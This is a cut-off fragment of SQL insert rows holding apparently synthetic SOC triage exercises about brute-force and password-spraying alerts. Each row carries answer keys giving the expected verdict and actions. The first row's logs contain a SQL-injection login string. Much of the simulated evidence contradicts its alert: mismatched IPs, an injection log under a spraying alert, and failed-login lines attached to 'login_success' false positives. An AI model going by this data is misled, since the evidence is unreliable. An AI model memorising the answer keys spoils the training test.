(1678, 'Password Spraying Attack Detected on Web Portal', 'critical', 'Splunk', 'Detected a password spraying attack against the internal web portal with multiple failed login attempts from an external IP.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:56:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"web-portal\",\"failed_attempts\":25}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal username involved in attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been flagged for malicious activity, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR 
\'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1679, 'SSH Brute Force Spike Detected', 'high', 'Wazuh', 'A spike in SSH login attempts was detected, indicating a potential brute force attack on the server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:10:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.33\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"ssh-server\",\"failed_attempts\":42}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in numerous brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a known malicious IP confirms the brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:57:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:56:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:55:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:54:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1680, 'False Positive: Internal SSH Activity', 'low', 'Elastic SIEM', 'Detected SSH login attempts from an internal IP address, likely due to a scheduled script.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:22:48Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.0.15\",\"dst_ip\":\"192.168.0.20\",\"username\":\"backup_user\",\"hostname\":\"backup-server\",\"failed_attempts\":2}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for scheduled tasks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user for backup operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity is consistent with internal maintenance operations.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:57:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:56:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:55:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:54:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1681, 'Password Spraying Attempt on Internal Network', 'medium', 'Azure Sentinel', 'Multiple failed login attempts detected from an external IP, suggesting a password spraying attempt.', 'Credential Attack', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-15T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.9\",\"username\":\"smith\",\"hostname\":\"internal-webapp\",\"failed_attempts\":30}', '2026-03-15 19:40:23', '2026-03-15 21:17:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple password spraying reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User involved in the detected attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP\'s malicious history confirms its involvement in the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:57:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:56:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:55:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:54:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1682, 'SSH Login Attempt from Suspicious External IP', 'high', 'Splunk', 'An external IP has been attempting to login via SSH, showing signs of a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:14:56Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.114.56\",\"dst_ip\":\"10.0.0.11\",\"username\":\"root\",\"hostname\":\"main-server\",\"failed_attempts\":50}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.114.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative username targeted\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated and rapid login attempts from a known malicious IP validate the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:57:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:56:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:55:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:54:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1683, 'False Positive: Scheduled Maintenance Login', 'low', 'Wazuh', 'Detected login attempts from an internal IP that match scheduled maintenance activities.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:02:14Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"maintenance\",\"hostname\":\"maintenance-server\",\"failed_attempts\":1}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with known maintenance activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"maintenance\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username for scheduled maintenance tasks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login activity aligns with expected maintenance operations.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:57:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:56:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:55:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:54:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1684, 'Suspicious Login Attempts from Known Malicious IP', 'high', 'Azure Sentinel', 'A known malicious IP has been attempting unauthorized logins, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:28:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.78\",\"dst_ip\":\"10.0.0.8\",\"username\":\"administrator\",\"hostname\":\"core-server\",\"failed_attempts\":45}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s malicious history corroborates the detected attack pattern.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:57:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event 
